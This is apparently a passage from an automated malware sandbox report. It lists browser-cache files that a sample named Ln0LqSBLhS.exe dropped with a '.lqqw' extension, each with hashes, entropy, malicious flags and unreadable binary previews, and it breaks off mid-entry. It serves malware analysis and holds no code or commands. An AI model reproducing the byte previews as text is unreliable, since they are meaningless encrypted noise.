                                                                                                                                                                                                    Preview: ..<.%.C,.5.Yx.9.......N.B..........B,.b$..4...vV..R.....U.O....y..~3.` .F....fP.....B5.K?.l:...*...SQ..O.z..,G1.7f..q.`D.......WB.1l2,.P.pt.....>\.q...\....<j............W..-.#....E....EOf) .^.....HSb0~..o..a..>N.:I.#Uy..k..3e.^g7.L:.r.i...(..6..7p....Py.,^A......G....KQ...7...jb..*...e4.u....]#...L}....htx..<..2$1yn.2\J.#/.[R,..~...9.k..7)_Z.}H[..in.c.E.}.%.7..?./7.C...2. .'..b....M-..k....~...P..R&.'..u...k3.+.A..e.BNV......I`iI..U].@.DD/.r....3......e)Q.;/.+..}...........;&.....)...t.Hc..z..W...fg.M.$..J..Ws...%{.Os|...N...n.Byob..VZ.....T.. Fy...dp;..".Z..n.N..c..$.......w......Yg..)!........^.-r..<..O......7pD.*.YY.".o.~.9.....}.ylD33.a.k..32ZDB...K..J\k..%...3.a..w...........|...=...C.^.....a....Ck.z.....$+9..].O..p.MZ.^..L...}T...;.! R......-........^M..9.....8D.q...&.....>!...9*.....{..RXz...8/2...9_.$z...t....m..<t.......].`...........p8|?.@.\J!B.+.....^..$.-M..E..M.......M0.>.-.9...i.....I.U.....%..!.zu.............m...G
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\0W10PBUV\favicon-16x16[1].png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1040
                                                                                                                                                                                                    Entropy (8bit):7.7567536563405035
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:/DuY6O+YOalpVScv9b2oCHmgARPHkUdDYt1eSev7pJpA6V7MRBbD:/D/+YVXSclb2+JNmeJ7/6D
                                                                                                                                                                                                    MD5:940892FCF8C4B0BEA4B6A7EEDFFBADE3
                                                                                                                                                                                                    SHA1:34887AE7FFEAE8051F5DA35F2534C0102E5D6E01
                                                                                                                                                                                                    SHA-256:42F297C849ADAD057410DA82D1DDB0FEC03FAECCBA57C59CF1425C031341739A
                                                                                                                                                                                                    SHA-512:B867EE8CBE97C2151335D0ECE91CB9532B18E373452BA9D1BD07F9291B7203AC457AEBFA0DCF4D4B7966F404AAFF73E3E73076C8AFC589117423E3815F22B4AE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..c.nIw.$.....JTc..U.:5h...?..ww..D..S.... .....z..V.|..?.|m5.AUc..r../....V...r..=e0\7j.............E.y&.q.@...i.o....i.p.L'.3.....S.~.."kLZZK7.4...,.....e..!.7z....E..x...h6.;g.`"g..o.7gl....i....=...9.W...Z;a.......F.0.i...'.w_....4..0J..8E2.....|...XH4.K...N...N..4L..$.....3'.........>..!6bS}24_.........]......[.>;..+..i....h.XO.b..b.......L.........M..Q.;./........%.>..S.4..k....^.Q.".m.Ua..o./..3..N...."79..!m..'.T.Q#-.$o...4..)oz............|...p..^.\..<1...'(j.......2Ibw[.....u........8^....~...K|...SILu......G.,...>}0.1B.(.L.Q..j.Y..\..j............4......%mJ.....Q.L....!...G.[3.k....A.2.......(G..T.N.s..d.Y.1uGYH.].........g...s=wo..d.Ds........\dh..a.s..c.l3.!.....g.-.#...a...>.....k2NS}.O.......0TF./.#..uak0k9.R.t.......z9..7-.u..\..MA.....9..SE..z......<...t........aU4.].....H...=.j=...5D.u..b.B.[.mAc....T..!............d..-........../C.......*. .......d...V..O4.7.8...Kt..T..?>..N..+5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQ
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\0W10PBUV\update10[1].xml.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1322
                                                                                                                                                                                                    Entropy (8bit):7.827839198046972
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:GlOuM1+41TuSU3DzCZdzH13fIwYwwg919tnYsd1NjqBEEUIZ5UvyxIWbD:J1+41urGdHB1btYsdzqBEEUIZqvydD
                                                                                                                                                                                                    MD5:524BD82DE2E70F158B372B4110AAA33F
                                                                                                                                                                                                    SHA1:DCED446069B16861FD99F570AFCDA8EC14BC8405
                                                                                                                                                                                                    SHA-256:4D77887945271CD4EAEDD7B20FCE64AD778AAFA8101A6598674721F169C22E2E
                                                                                                                                                                                                    SHA-512:6841458331AA6893EBC6571727C422D3FF2AE854C48AD35CB37E5953B2BC88A0D627D0E096D41DC006E8E39CAB4CA22F2ACF5698340A48F1C5DC3225F9472524
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: <.\.q..Y..!. .....w.Bl.....[...$.....Q....,A..a..-..."$b..#|K....~.IT%..o\.K\z[*.."..1^0z...8...L....rW6.-.~...%.@L..@..........2._;W..m....^.dg...J~.[.2...~.$X#9......gp=....6......LO.0"..7..j.P~E..m...*%.OH`...4....D.G...`Eep....+. w~..w....sa9..5...6..pq....$..^..J\."a.J....h..L....r..9..1.Ik*....*q..5...(..P...kT]...Xg9.....9."....:.<..l..p.....~.....#.....$.(..q..Gn..x-B.t...n.k}}o.....qo.|..-...O..NBVH..f..J;S.>.hp...y..[M].`.....!....E.........yC.7,.....:....d.J.No]_u.$..o..<.N0..v.y..F....U1M......bt.JL..- Y(..J...'..mx;-..`.y).)<..-C...1..t.'o...9...y.N....R5......th.4.\.N.70..)..L........x.i.>....)/p......]0..-..9*.4.4."m..k......~9. .~myhg"..*9v.+9.*j..*...JC.|....9..(0.E...1.g..............4.#)....4.....{....M.....]...w.H..X..R...F....s..?.v.'E......O.....&\W..T..........F..a.(.........4i...T......*z&A...?.Z..E>/..@...........w.[..XK.Ege....w\.....v..~..4.9`Tqe.q.....a..G).5>.-.#1...a....8ylW0vA..o..ICBb.s:$K.../)...KH
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\0W10PBUV\windows-app-web-link[1].json.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):439
                                                                                                                                                                                                    Entropy (8bit):7.396590684844858
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:3/86SrLfHDqn3dVi3duI3vr3TaMuTTcii9a:P86lnQuKrTeTTbD
                                                                                                                                                                                                    MD5:A8C9F2741006DB5906DD0A71FA64E5C3
                                                                                                                                                                                                    SHA1:EFDE3CF7D5399843099589E970A96F24380E7EF6
                                                                                                                                                                                                    SHA-256:B74FD6188EB3AEF61612218FF7B571038FE4894EA8515B613C15D11617D1D0C0
                                                                                                                                                                                                    SHA-512:D1341146FD78B2C9E32A9FA9F8E7308AED9469AAF942B234249FB7AFBC1A1129158464C688751C92741871CDAE0F838BE6E4728FCE54BEE7BC9DF193288A7C37
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .O..M........_..8..o..j.z .3@oZ+|.e.0..C.f...:.C..i.'.d..0>..9.....K..2..R..9r.t...~.Y.W.v6..N......../@.C..........3.....).........g.h.9b_.......J5.]..%.R5J-..4tz..qyr.....}.s.xR.u....@..e..R/..[H!T.l..0...\.....w...2X...?a.9.#..7K...Aed....2...9I.5.....q1....*.....>Jh`{.Ir.en;.{.v..O.I"'i.S..N....=.0.5.........>.....>.$..l...d..UK....(}*M.A.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\MEEXW4H4\ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJnA2[1].js.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):30269
                                                                                                                                                                                                    Entropy (8bit):7.993995290025147
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:ZgcZFEFfqgWN5mBiM2Akf6bb6L+9Dw8iaWrGZ7xJryOXRU/zVd2GjkK:x+FMmBByyKeDw8QrGdxJuOU28kK
                                                                                                                                                                                                    MD5:8A07FB66A4EF47048A9221EDA063754D
                                                                                                                                                                                                    SHA1:A3A8732F9CC0ACAD81BCC00EDFD870398B213752
                                                                                                                                                                                                    SHA-256:3D0E15AC641FC5D371648D8C20A0506405B70BBB555915754D61450C1C45D158
                                                                                                                                                                                                    SHA-512:7C321F7A617E6E036BF0A6F3BB4459CEB7BA41AF5D24792DD5C5BF4A00E22ADD5C49E2D5A1C8761B9BBC741C54790AA27EAD5F97B1F765442B7CA34950A5F352
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: "ed{......:...0.>...2.f........r...w.....\r..E..68C<...G.\./.~..\..J.>q~-.S.....|7v.W`..5...u..AN["....J......a.H.nTp<B`.w.hD..-.V...xev.?.<nB.3<t......D..G&....[E....~.|.|zG#.....2....M...v..Y......@(..F_./......U\%.......>.n.M.......!......9..XO.y.uj.D.F.v...3.......!...pzvwI.r...JA~.....*..G..!e..1#..y~...t..Z?<Xt.F..&...0K..E.{..I1..Q....N...A........6.7a\jg5x......C...$....6.1..%....<...*v......9...|....'..D&DF...N.....ZF...p.....+^E.O.T**.....U$..Vi......--6.....-..X.i..M..3...)~_..@..^.Ig;=..9FE. ...OW......^..N..e.R...s...kGr<1........}a~..r9,(..[>W.|_..F.Z.-.P..:@......vZ[i.M+"}.v.AM...JCDye.l..1..._..~.]..Q+.Zr..(..}.^$.#..90_....u....._._.....D.......~./..nX.C..g\y...D..vW.d....Y.&Vy6.v......3..wa....@...L.M....8.cg,.....~%...i&.B....f......rv7..u..l..\.n...B.......%P.E@|.k!.D.I....O..I..n..A^.e..r.0.-tz....f...E>Mt...?.&.>........l.....".r.zz.W...R.....n..d...!.....S>.u..<..-nQ.............F=.2....($yn..5.........%.K.....P(.....bSj.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\MEEXW4H4\PreSignInSettingsConfig[1].json.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):30121
                                                                                                                                                                                                    Entropy (8bit):7.994401444142447
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:/fRf/1GArwqlOtebzM4y7F7AirQr/wiD4GFd:htrPlux7AirW/xD46
                                                                                                                                                                                                    MD5:F15332222A72596BFAEA2580304B3601
                                                                                                                                                                                                    SHA1:65E187D835145A529A601CC66DDF4A77CDF4A3D0
                                                                                                                                                                                                    SHA-256:1FEDC03C14F1DCEB21447C6A5F10410FD9A61E1BBC21DD5B9992580120F0F6B5
                                                                                                                                                                                                    SHA-512:B603A8BB776A15EC887EC3DAA83E9030D14AD3B87D892D9C81806ECD6C1BC4A07506372B0CED3F11475C3B65FFA20A6D78E6C188576F8664AC8869C9B90D1027
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: . S....8/.q..~.Yo...f.@.W..;....)$9..vM.R...H.e.A....?..%Ty.bS.68.1I......>+D~r&..NJ5.9MG}...#.R.PK..<.I2.....{.j...m..z......8.."UV.....7{.S... < ....<....wkQ)z ....vU..t!W.....C....|.c.d../K.tZ.7..#Y..5.q..q...I..A...A.._6.s.`.v....z.=.(f..!4.\.''._..&..S........u....x".-X..%gd.$Z8^..$...tTaj..>.#&..;.M.u.s.-..t..........Z.@So.E.s...k$K .A..x...&#...Gs.(Z.2.UBv=..989.%.U..(..].....%..:....-...4.w..&...%...........i..MN..&.kw$...g...4......=h.$..9Xk..'..."....0.>....VM{..).Z3.h..........G.M...H.K...4v}..P..........3...(..4..u5M......F...7w'.G.a...q........R.r.a*.c..".qX.r...K.:......L{........~...b....L..i.ABu.;.......g$*..D2..<Rm.^.{a..U_,/^L..m/I...r%7'.R..."......$. us..z...1.^.{.........~.U...J.3!.]2uE.S5..@..)..M.}1.h......(f.W.P..|X..{....a.Q.{nJ...9l&GiP...].K..'.j.n.#.:e.6...*=..U..'.v.........d..?I4.4Wd\....O.H..'/.9.qh.7r.}..U6.FT..9-^.F....=#+.H.;....`. .i..m..&.v.^!.......;.~,....G.x.....@...{..wp..c.XE....d..(.x..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\MEEXW4H4\RdrManifest3[1].msi.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):15177
                                                                                                                                                                                                    Entropy (8bit):7.987422586138198
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:JK7bT4VnVeWzQODS9zeEvQtQFP28ze+fKUw7OzKZE/yM:CWQWzQQwzeEv+c28S+JF+VM
                                                                                                                                                                                                    MD5:DBE7AEBB016EEF8C08C4B8F8629AA768
                                                                                                                                                                                                    SHA1:08216A659DC0740EAEDE6A81326F60FD818CF7C6
                                                                                                                                                                                                    SHA-256:E64223299EA669964DE5D8207A53A11F9EBFC6C4AC849AF98F08C580929744B0
                                                                                                                                                                                                    SHA-512:928325B351675FF1BA28DB7D3BC524123D37CCFC2137E06A7DEE75808D5634AF8D1098718726B61944A7EFA1CD3F5D9EE86ADA5296C12C35CDA51340ADEED2EB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......wg.............l.N.R.t.j.Ol........h.....A....T...&.. @A.n..@..e.\..R....MXS=....a.pNZg..X....-..kJ.......1......\..rnC."..Y.2P..b.7.n.t......2...i...}..........^...2}..H.7..Z...$Z.s.....g.. .=X.b....Rg.&.+ .O5..H.ti.\....Gy...........4j.././.JR?.K...Y.u...#!..QS.G......z..V...}..@.,.iv.te.VT.QX.......3.....+*..u...#.Fz...I..\&.d.F..h:K.g,h.X..>.#US.Nl.N.}.4........=m.b.c.".....An.~..1..Vtx.x.Q......*l.{wIBy.,..k....4]..ui3C..AWv..N7....2U...C.l".....[...? 7..@... ..m4.(..Q...!.$..,.c8......g.H..01.....3a.b.......V....J..6..yG...J1V.....1..ho].......,..Xfz.4.x........UUD...X.(...LR0.........z;...K_..Gn#....b7..l...x.....N.....lN...*.T... .sd.......)H.%...OZjQ~S..K..[...j.=H](.\.....8r....?K-..V_.....)........JA.q.Q[.0.F(..b..1..J...^V.le...1!.j-.d-.....J.......Y.5Rq.,ZY...=..........y.r|..1..z..Eh.:.m...[.U...a.....n.,U+....A.E..-.\g.gg..u8....."../..f...G".)...zD.R.....P.......q#?..}.}..3R.....4.t.ye.Lq..y.Y.5..VPYv.;
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\MEEXW4H4\bing_p_rr_teal_min[1].ico.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):639
                                                                                                                                                                                                    Entropy (8bit):7.615417673293133
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:6U0/x488QyQWnYb7WelHRLye17jB1fKhMOvx//JgjYRscii9a:msy77Ll1791zOp/mkybD
                                                                                                                                                                                                    MD5:20BC0E4C47D7F6CC2C6980646379991E
                                                                                                                                                                                                    SHA1:649C1DAD5E407668C525D112400FE8A6E16A5990
                                                                                                                                                                                                    SHA-256:B497958FAD4890AE62DE113C657E087AD54CC653D37C057528A836762AA53B46
                                                                                                                                                                                                    SHA-512:53044FFC2F756E3290EB48D7DE68809561699ABB75A9970B1AD5A6B66C816AD89A6FFE532A48F7533CDAE004446549D900592CE9781257721052D803091A7699
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...cZ.........X.8.....q.......j|I.V^..T.).u....NX...l..Z..F3.?.$ ..G.....^u9.......B.X...'...Y3gP...Q?"....P.@v`t)S...........O..G0...................ML..We..Ns....-r..+.;..r..da..r*y.../.K.+.S.v.....i.........9...>.(...*.H4 ..Z.2e.o..6e.....>....R.....a...a.S{..{...g..8G".%.../..p.V.I8.6...R%..P<%QQ..<...fi.&.!.+....7S{..q...I...*Y..Z../....../.2.k$6M..6~...2k..:.?qQ....).G\.......5.....T..7../.I...u......|E..C...9?ov......P.......:x....C.kx=.L]..F...-!..O...;.vu.J.$\........R...2..iI.9|.....+.ZU,q.~..d.)Q..I.8.......t.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\MEEXW4H4\suggestions[1].en-US.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):18505
                                                                                                                                                                                                    Entropy (8bit):7.990890073676279
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:L6euKn29l8sh34J2whBjrjnZgV57XTDJigxsGD3hcF5N2e:ee1neJdERXZe5DDbDxcF5Ae
                                                                                                                                                                                                    MD5:3368F50EF36558AD0DC66312DA13D5D6
                                                                                                                                                                                                    SHA1:FFD11186882DC5181569A8A605C80D6770B9D90A
                                                                                                                                                                                                    SHA-256:B52F8058F273628C40F2CCEBF2BCFFE77795391EE4E4B965DDB66934E33F56A9
                                                                                                                                                                                                    SHA-512:388549197A030308F9B5B868B2B97AE0BB1B321E546CC814FD176B515A2C6C87F6B1F0D52B2A6740804E08728DF18D245D83779AC9D5DAAB3C8FC1A8A109B476
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: D.6#....xS..\}L....4.R8.W..oKm?.`.. ~.c....0.,.=!..3..0....3.J....\.T:..)Nh..9'm.s/<..........(...;......?.m...f.q..sNm.Rj.q0%.....O.n.'.#..3gY..M...1.....!_..W?.. ...\....u.G....b.fL....>[...g......Z.c&.\...........J.....tbKO.........C.%!.f..5..1$........k{'7...;.s..=...a..y.tXx3.2.......k....*.....T.....z...M...x..h.......I.u<0...H..F..M..^%.....n.m..^.v.....r..D.&M......m..mF..W..%h.e.C/8.Y.G....[.......Kl,..dj."....]1...k...V:V....q.Qb..^...7%K~..\U|y@..,P.cC...l.n...j...^..,..o<."..7^6..+pg...zE.<.;.#...C......TR...=s.^e.......i.C..M.sEv.n..h..r.@.Uw.%..4z.....x.3....H..!.vU.u.../v..&....b5..M.&.2.u5.w....m.z..6 ..>.....'HD..xw.Kjl]!..iAx..V.F..>D....Bp.3.j.8l9.#...1.`G/.d.o..*.a..Z..........%..Me.....<c(...v"Y5!.....UU...l.C_..D.W...T.N......,pu..[.W...b....? . ....(Wz.Dz1...y...~.'. ..1....i.4h..1&qtH....:q3'R.....,P.t..n..f.o......?#.`.....<k.R..Z.~.Gu-..D...N.....4..f......`...[dY?@;.r..4..+U,.t).K..C.0.b.,..C7S..,.|9kY
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\PSUEOSZZ\l1[1].dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):35946
                                                                                                                                                                                                    Entropy (8bit):7.995239406356059
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:hQtcqlyNPrvIEcOVIaLGtQ3O6HE0B1fSQZvHyrlyb61Tp2ggap:9wydvd6aLqwZnxSMHyrob61Tjp
                                                                                                                                                                                                    MD5:053F09436162EB2EBADA233AD15E343F
                                                                                                                                                                                                    SHA1:1E7A611CB077362B3F6D880AC37A4069D6AA2E74
                                                                                                                                                                                                    SHA-256:8507346A2721A6C1BA4DBE84C16AA96AD5327AA0EAA40A58FF6A507D4E96360F
                                                                                                                                                                                                    SHA-512:39561AF94CB1C9222A2D2065FE63EF9EF1D8B38FCBD838ED0707A8543733209E5323C5BCF713E57A18648E588DEBD92082B25539877741E15D2A671A225058E2
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..^.._`...d$g.q.s.'~5G........VA,...C..0&..+.@.n...z.b..]{.h;.^+v.o1.....hq@./.....k|...*A...r..f.......}..~=.M.o^...O.q.r...#d?A..zr......?|..D..2....b..X..&...dl...J..$...S.&N....K.......b.>>.c...NlQ...?........Z...:-c.y..d..r{.....t.l] 9.#|...cu......aD%.yB...R.....v6O.H..o.|)N.{....._.../.c..tb....(.e.D..q.tsU..G.]..T..L..+...D3.....-..=....M.+.Kq....A2...X.!.!.O...i-.da..j|...[u...5g.q....mQ.J...=.R..H...xO.X.x...Ey.Y....g,E...~[j%ot.7;u...".b.L,..<...u.V......e..w..Y.%fP@t<..Z..p.A......v.B.....N..k_LX..........7[&_...G.T.3...0=..%5.jT..&....#.5w......3+.d;Fmj%....?.$...X.h...I.bP.-....U..o.gF..z.^./.....P'.#."..x.3......S....a.. *..wv.c.X.1...}...../=......Y..:...j...RFq.+..*w0.C..D...#C.Lt;t.c..........N.@....0..uU..O..AS{m..:..DT.bG.&.-c.x....?.$.3>~...w..K.$(3..(|K.0...e....s.d.........j.'.=`..@../.N..7"...).'..6..d.u.RQ......K.z.L.'.*Y.."k....Us.3...i.>.`..J.....r(................F.a.~F5..D.]..-.-..y\a3.wD|%.A..*Z....(...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\PSUEOSZZ\microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd[1].svg.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3980
                                                                                                                                                                                                    Entropy (8bit):7.952472773460664
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:uP4FVaicskEJfMBNxoeDUVJsDVKACx9vUcy1unhgHNMzUDr:HZcskCEBNxaV+MAKvsunhrzUDr
                                                                                                                                                                                                    MD5:534339D1944132AAD05FEBE0D3DD3D36
                                                                                                                                                                                                    SHA1:1E3DD764D0CB86D00E331C8ED721E5FB396161FD
                                                                                                                                                                                                    SHA-256:DF7939D08D8C530F353690AC7574BC92623EC06F209DF1437C886CC2C2067AE3
                                                                                                                                                                                                    SHA-512:507669166CEAEB719352F119694948BF76D355ED41E5FAF1ED666E405A5CD820FD1C6C1BD0B5DEDDFE724824AB75CA870CDEA7D7E7A6AFCB84DEDE2FDE586A6A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...'d..D.t]...;l./.3..6......h.0+..5.U6.@.~J.o.1..3!...G.....@...Uk:|.\..@-.Qty.?{.~.G(Z|.=]Q8U....U......E>E.2..SE....aPY.......:7..~...E...g.@.d.U....:.\.....6.....~E.o.EV1.D...-.Z#..H.*..{ik..6...S.E!&..G...N.e..L"..../}V.R....2.C.c.2i.....oaOO.4mI...c^.$H....hI.S..|...L{x.^..0.#..J..x..lek=........8B4..cC.d.=..{.f..$..6`.w...Hv..jZo&....0.#....D .$>.S.}R.I...b..{....J....=......6...Q....M1.....!.0Y/.j=Y.......eJ.-I.qU=.[....z2.......l...b=Vq..]W......(H...e?.*.w.....k.%.P"r}.S%....B.a)(.E..aI"......hGN7....Y.h.<..sN.#.p1....=.Md....`.f._...y./.'..C..=..37......6'...o.Q.L..[....-..7.>.(....aN.N.$+......n. .AS"....>.V|90...CO...s.oe..F.I.J...C-..)M....5..=$...z......+R.].B.(...10.Yd31:.._....{..,.\.6.5..,@M..l....j.X.Z...|.B.....jf.|=5DE...`.....w.h..XP...n.0#...:G....D..B-n_.0\..V@..IM.SH...cL..s..>S.j.:..C5..K.GS1...:...<....]J.~#........L......v.$.F.8uH..."..n.]u.u.....N.)..A.A.|5#..."..s...*...m..G+.Y...^5}E.?7..=....!M..0G....F8
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\PSUEOSZZ\settings-tipset[1].xml.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):13379
                                                                                                                                                                                                    Entropy (8bit):7.986408387818189
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:Q0oxGqQtLQtLhEcjJr315DLI1P1KBh0C8J8C4b:eQqQ9Q1V55DLeP1KD0F8V
                                                                                                                                                                                                    MD5:2C184A5296B797AA06DBC2888325B43F
                                                                                                                                                                                                    SHA1:6F2B06F4E0E2B09551231C176CF80797B8ED9115
                                                                                                                                                                                                    SHA-256:3B527965A0FFED6B5B1B60C80D8753A8E1A0CDDD96EB856B43F0D7513BDA9289
                                                                                                                                                                                                    SHA-512:60FCC4D574A6D07C21B0A7D73AA1F3919B099AA2D2F09D63A01CAC17EC5BC183636BAF3EB94D46A545F34597408E472A74D86080E490254EBD234A616C9DF87B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...$.%.....RS8..$........9....U]s......8.4"ok..]..9..U.kqJ.6j*Epq..4$U...Glf....MXWB..=#.......t.*.I...nr...d.. .j:....{..=Cw".`..........g.m.d......</.........sC2.tcD."...i.....Q...d.1.<.sO> ....j......-W.u..GO..8..m.....f.g.y.+....':>T].0....".W..Wp..9..=.@.U...L&O.4..W.(a.a`i.....L.g....?....$,.\..QN.......".R....m......6...S..5.rv..?..?.I.X.O..).q4...3..J.....\2...y..%..........5.?.7y.W!.B....z.%e.R...<.<].V.5(...#...OMo.K.2?..L...g.....3.W.J...D...lM.gFda-.{...........@.g.......G2.......`.$,.X..%(ST....{.=/K.....{}O$......A..h..eJ...5?4.}..@......s.Q.i..T......X{.K...gt..%g....@..Y.D......O..../..M.Y.-E....).CW\...J:5.....<.&..sM.t.'..$~.v3.h.D....Z....L......z.].....P.>EPP.Gh.@...%..53.......Dk.#..tY...i..I35.....i+*.P.......~.....P.k.oW....]N=..G..A.m.X......<..@....B..yzS.JS..Xl....L.h.v.7Z!]./.o...(K.....J..*..).N...o..(.2.&..h...{.!L:sm,P...p..._.a..._.I;1..%..3[..J=.qy4..tx..l.......7...e.......Hh)4 V...7C.0Vh.RV...M
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\PSUEOSZZ\windows-app-web-link[1].json.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):427
                                                                                                                                                                                                    Entropy (8bit):7.353955763999291
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:hXa3LkjCu0mhO/jjC0v5JLyot4euXQ9SKkcii9a:mLkjCuds/jrLyot4DQubD
                                                                                                                                                                                                    MD5:BF2BCA4F2808B79263249CE3DD6650D4
                                                                                                                                                                                                    SHA1:65D4565DDE45D58CF0DC129157F0517A17E63FA7
                                                                                                                                                                                                    SHA-256:84C8973A06266E7D08EFB9AC3D2A6E72E4720FFA6B4CC63B8659AAB3EE32C7C7
                                                                                                                                                                                                    SHA-512:EC6D5DF5E4D55783C0875F3E480D6EEEB423CA62E632F3344B609B979E70A242274A8E5806289FFC76EC29010B275B6C6BE74FD98854B0D07AC462707BB4AB05
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: V...,".....j...-._.f.&.].R8U.c.d.87dL*..j.....B.....x2.....C.......@._t4....H..1..l...j....R....H........=.+..........}.A.......@(.-.S...........2.....2..K...D.r97.x*D9.G.J.w...$..H..... ...Hi......c.4.....;.D..H....%*.p....z...L.#.r.D.....Q....3..?O...C"!..l*\eDq......c...SA|.A....[.d.......;.r..x3...%O..' .xw.%Ok[....d...b-}.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\WJ8I2OL4\Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2[1].css.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
